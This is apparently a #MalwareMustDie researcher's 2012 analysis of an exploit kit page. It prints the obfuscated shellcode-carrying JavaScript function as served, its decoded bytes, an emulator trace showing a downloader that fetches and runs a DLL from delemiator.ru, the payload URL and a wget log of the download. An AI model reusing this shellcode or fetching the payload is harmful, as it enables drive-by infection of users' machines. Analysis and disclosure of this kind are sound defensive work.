
#MalwareMustDie FLUSH4 - PluginDetect 0.7.9. Nov 25, 2012

  1. =======================================
  2. #MalwareMustDie - @unixfreaxjp ~]$ date
  3. Sun Nov 25 20:58:35 JST 2012
  4.  
  5. GET THE EXE PAYLOAD via SHELLCODE
  6. =======================================
  7. // The shellcode was detected as well; here is the function that carries it,
  8. // reproduced exactly as it was served (armed & loaded):
  9.  function getShellCode()
  10.  {
  11.    var a="8200!%5482!%4451!%e015!%51d5!%c4c5!%34e0!%5191!%e0e5!%9174!%2421!%2191!%b191!%3421!%2191!%9134!%b121!%21b1!%b1a1!%5421!%2191!%9134!%e521!%51a1!%74d4!%b1e0!%21b1!%9114!%1421!%2191!%9164!%8121!%51b1!%85e4!%8571!%8504!%6460!%d554!%7444!%70b4!%34b5!%1464!%7044!%d554!%74a5!%70e4!%0181!%0181!%d521!%60a5!%74a5!%94c5!%5414!%44d4!%c4d4!%7070!%8521!%c5c5!%8504!%2370!%15e1!%eee6!%3733!%2e2a!%59b1!%7492!%621a!%6d2a!%4c0b!%6662!%7d6a!%6d7d!%0c4b!%e702!%6d7d!%8224!%ce24!%82d5!%8a71!%2df6!%82d5!%8a71!%b3f6!%a23c!%423c!%babe!%e7c2!%b77d!%3c42!%82ba!%c224!%7de7!%82b7!%e324!%8ed5!%c3da!%7de7!%2482!%b7f7!%2482!%2482!%9697!%53c2!%0ac6!%c281!%2a9e!%8217!%5312!%eec6!%4444!%60c4!%53d2!%fec6!%a4c5!%f585!%5382!%fec6!%1e97!%0cb1!%423a!%7de7!%8282!%0d82!%b704!%b580!%8050!%c002!%fec6!%b1a1!%e5a5!%c0c2!%fec6!%f4b5!%a5d4!%c2c0!%42fe!%47c0!%825a!%9282!%4cc2!%a59a!%a23c!%7d3c!%7d7d!%0c94!%3a0c!%ce02!%e3ba!%c77d!%4454!%d5a5!%8204!%6482!%0474!%7dbc!%bed2!%83ba!%3a67!%3a4c!%87d7!%8e13!%87ba!%8282!%7d82!%8604!%8724!%8207!%8282!%0c82!%ac1d!%7d7d!%0b7d!%170c!%24d2!%3afd!%0402!%bd3a!%eb3c!%c5b2!%42b1!%8a55!%0480!%583a!%3cb7!%17be!%3867!%b2de!%c23a!%5f3a!%0fb2!%423a!%c7c0!%4c7d!%5ae6!%4236!%e43a!%b25f!%67c0!%673a!%d5ec!%3173!%3c9d!%2f86!%52b2!%9e3e!%c502!%01ad!%6983!%3f72!%deb1!%58b2!%964d!%1e16!%ddb1!%80b2!%3ae5!%dde7!%05b2!%c5d1!%413a!%3ad5!%97e7!%3c46!%971c!%ccd5!%c0da!%fac1!%d53d!%11e2!%bee6!%8681!%093a!%7d7d!%d383!%9a6c!%b140!%b2c5!%6741!%e43a!%b13f!%e502!%e73a!%8543!%423a!%3a86!%8681!%c43a!%b18e!%1c77!%d5c1!%dacc!%ffff!%beff!%508e!%afbe!%042e!%0382!%ef08!%9eb0!%6618!%139c!%0185!%cfbe!%4ecf!%6638!%1414!%
  12.   1414!%".split("").reverse().join("");
  13. //   return str_replace((window.document)?"%!":"", "%u", a) // I commented this on purpose...
  14.  }
  15.  
  16. // Dumping var a after the .reverse() step (captured in the proxy, presumably Burp) gives the string below, still carrying the "%!" separators:
  17.  
  18. %!4141%!4141%!8366%!fce4%!ebfc%!5810%!c931%!8166%!0be9%!80fe%!2830%!e240%!ebfa%!e805%!ffeb%!ffff%!ccad%!1c5d%!77c1%!e81b%!a34c%!1868%!68a3%!a324%!3458%!a37e%!205e%!f31b%!a34e%!1476%!5c2b%!041b%!c6a9%!383d%!d7d7%!a390%!1868%!6eeb%!2e11%!d35d%!1caf%!ad0c%!5dcc%!c179%!64c3%!7e79%!5da3%!a314%!1d5c%!2b50%!7edd%!5ea3%!2b08%!1bdd%!61e1%!d469%!2b85%!1bed%!27f3%!3896%!da10%!205c%!e3e9%!2b25%!68f2%!d9c3%!3713%!ce5d%!a376%!0c76%!f52b%!a34e%!6324%!6ea5%!d7c4%!0c7c%!a324%!2bf0%!a3f5%!a32c%!ed2b%!7683%!eb71%!7bc3%!a385%!0840%!55a8%!1b24%!2b5c%!c3be%!a3db%!2040%!dfa3%!2d42%!c071%!d7b0%!d7d7%!d1ca%!28c0%!2828%!7028%!4278%!4068%!28d7%!2828%!ab78%!31e8%!7d78%!c4a3%!76a3%!ab38%!2deb%!cbd7%!4740%!2846%!4028%!5a5d%!4544%!d77c%!ab3e%!20ec%!c0a3%!49c0%!d7d7%!c3d7%!c32a%!a95a%!2cc4%!2829%!a528%!0c74%!ef24%!0c2c%!4d5a%!5b4f%!6cef%!2c0c%!5a5e%!1a1b%!6cef%!200c%!0508%!085b%!407b%!28d0%!2828%!7ed7%!a324%!1bc0%!79e1%!6cef%!2835%!585f%!5c4a%!6cef%!2d35%!4c06%!4444%!6cee%!2135%!7128%!e9a2%!182c%!6ca0%!2c35%!7969%!2842%!2842%!7f7b%!2842%!7ed7%!ad3c%!5de8%!423e%!7b28%!7ed7%!422c%!ab28%!24c3%!d77b%!2c7e%!ebab%!c324%!c32a%!6f3b%!17a8%!5d28%!6fd2%!17a8%!5d28%!42ec%!4228%!d7d6%!207e%!b4c0%!d7d6%!a6d7%!2666%!b0c4%!a2d6%!a126%!2947%!1b95%!a2e2%!3373%!6eee%!1e51%!0732%!4058%!5c5c%!1258%!0707%!4d4c%!4d44%!4145%!5c49%!5a47%!5a06%!125d%!1810%!1810%!4e07%!5a47%!455d%!4407%!4641%!5b43%!4b07%!4447%!455d%!0646%!4058%!1758%!4e58%!1b15%!1218%!4619%!1912%!1241%!4119%!1b12%!0e1b%!4d47%!1a15%!125e%!4319%!1912%!1245%!1a1b%!1b12%!121b%!4319%!1912%!1243%!191b%!1912%!1242%!4719%!5e0e%!1915%!0e43%!5c4c%!5d15%!510e%!1544%!2845%!0028
  19.  
  20. // Applying the commented-out step, str_replace("%!", "%u", a), gives the %u-encoded form below. Note the gate in the original: "%!" is only used as the search string when window.document exists; without a DOM it becomes "" and the %u escapes are never produced, which looks like a cheap anti-emulation check...
  21.  
  22. %u4141%u4141%u8366%ufce4%uebfc%u5810%uc931%u8166%u0be9%u80fe%u2830%ue240%uebfa%ue805%uffeb%uffff%uccad%u1c5d%u77c1%ue81b%ua34c%u1868%u68a3%ua324%u3458%ua37e%u205e%uf31b%ua34e%u1476%u5c2b%u041b%uc6a9%u383d%ud7d7%ua390%u1868%u6eeb%u2e11%ud35d%u1caf%uad0c%u5dcc%uc179%u64c3%u7e79%u5da3%ua314%u1d5c%u2b50%u7edd%u5ea3%u2b08%u1bdd%u61e1%ud469%u2b85%u1bed%u27f3%u3896%uda10%u205c%ue3e9%u2b25%u68f2%ud9c3%u3713%uce5d%ua376%u0c76%uf52b%ua34e%u6324%u6ea5%ud7c4%u0c7c%ua324%u2bf0%ua3f5%ua32c%ued2b%u7683%ueb71%u7bc3%ua385%u0840%u55a8%u1b24%u2b5c%uc3be%ua3db%u2040%udfa3%u2d42%uc071%ud7b0%ud7d7%ud1ca%u28c0%u2828%u7028%u4278%u4068%u28d7%u2828%uab78%u31e8%u7d78%uc4a3%u76a3%uab38%u2deb%ucbd7%u4740%u2846%u4028%u5a5d%u4544%ud77c%uab3e%u20ec%uc0a3%u49c0%ud7d7%uc3d7%uc32a%ua95a%u2cc4%u2829%ua528%u0c74%uef24%u0c2c%u4d5a%u5b4f%u6cef%u2c0c%u5a5e%u1a1b%u6cef%u200c%u0508%u085b%u407b%u28d0%u2828%u7ed7%ua324%u1bc0%u79e1%u6cef%u2835%u585f%u5c4a%u6cef%u2d35%u4c06%u4444%u6cee%u2135%u7128%ue9a2%u182c%u6ca0%u2c35%u7969%u2842%u2842%u7f7b%u2842%u7ed7%uad3c%u5de8%u423e%u7b28%u7ed7%u422c%uab28%u24c3%ud77b%u2c7e%uebab%uc324%uc32a%u6f3b%u17a8%u5d28%u6fd2%u17a8%u5d28%u42ec%u4228%ud7d6%u207e%ub4c0%ud7d6%ua6d7%u2666%ub0c4%ua2d6%ua126%u2947%u1b95%ua2e2%u3373%u6eee%u1e51%u0732%u4058%u5c5c%u1258%u0707%u4d4c%u4d44%u4145%u5c49%u5a47%u5a06%u125d%u1810%u1810%u4e07%u5a47%u455d%u4407%u4641%u5b43%u4b07%u4447%u455d%u0646%u4058%u1758%u4e58%u1b15%u1218%u4619%u1912%u1241%u4119%u1b12%u0e1b%u4d47%u1a15%u125e%u4319%u1912%u1245%u1a1b%u1b12%u121b%u4319%u1912%u1243%u191b%u1912%u1242%u4719%u5e0e%u1915%u0e43%u5c4c%u5d15%u510e%u1544%u2845%u0028
  23.  
  24. // Or simply strip the "%!" separators to get the raw hex of the shellcode. Each 4-hex-digit group is one %u code unit and lands in memory little-endian (%u8366 is the bytes 66 83), which matters when you feed it to a disassembler or emulator...
  25.  
  26. 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
  27.  
  28. // Run the decoded bytes through an API-logging shellcode emulator and you get the call trace below: a URL downloader. The first %u groups read as a decoder stub (four 0x41 bytes, and sp,-4 / cld, a jmp/call/pop that loads the body address into eax, then xor byte [eax],0x28 / inc eax / loop over 0x1f5 = 501 bytes), so the strings and API names only exist after that XOR pass:
  29.  
  30. 0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4020cf, dwSize=255)
  31. 0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)
  32. 0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])    
  33. 0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=http://delemiator.ru:8080/forum/links/column.php?pf=30:1n:1i:1i:33&oe=2v:1k:1m:32:33:1k:1k:31:1j:1o&v=1k&dt=u&yl=m, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)
  34. 0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)   
  35. 0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)       
  36. 0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)
  37.  
  38. // As usual, it downloads the payload into %TEMP% as wpbt0.dll and executes it twice -- WinExec on the .dll path directly, then `regsvr32 -s` (silent DllRegisterServer) -- before TerminateThread. The download URL is:
  39.  
  40. http://delemiator.ru:8080/forum/links/column.php?pf=30:1n:1i:1i:33&oe=2v:1k:1m:32:33:1k:1k:31:1j:1o&v=1k&dt=u&yl=m
  41.  
  42. --19:14:57--  http://delemiator.ru:8080/forum/links/column.php?pf=30:1n:1i:1i:33&oe=2v:1k:1m:32:33:1k:1k:31:1j:1o&v=1k&dt=u&yl=m
  43.            => `column.php@pf=30%3A1n%3A1i%3A1i%3A33&oe=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&v=1k&dt=u&yl=m'
  44. Resolving delemiator.ru... 203.80.16.81, 208.87.243.131, 202.180.221.186
  45. Connecting to delemiator.ru|203.80.16.81|:8080... connected.
  46. HTTP request sent, awaiting response... 200 OK
  47. Length: 92,672 (91K) [application/x-msdownload]
  48. 19:15:00 (106.41 KB/s) - `column.php@pf=30%3A1n%3A1i%3A1i%3A33&oe=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&v=1k&dt=u&yl=m' saved [92672/92672]
  49.  
  50. ---
  51. #MalwareMustDie
  52. We fired your Exploit Kits...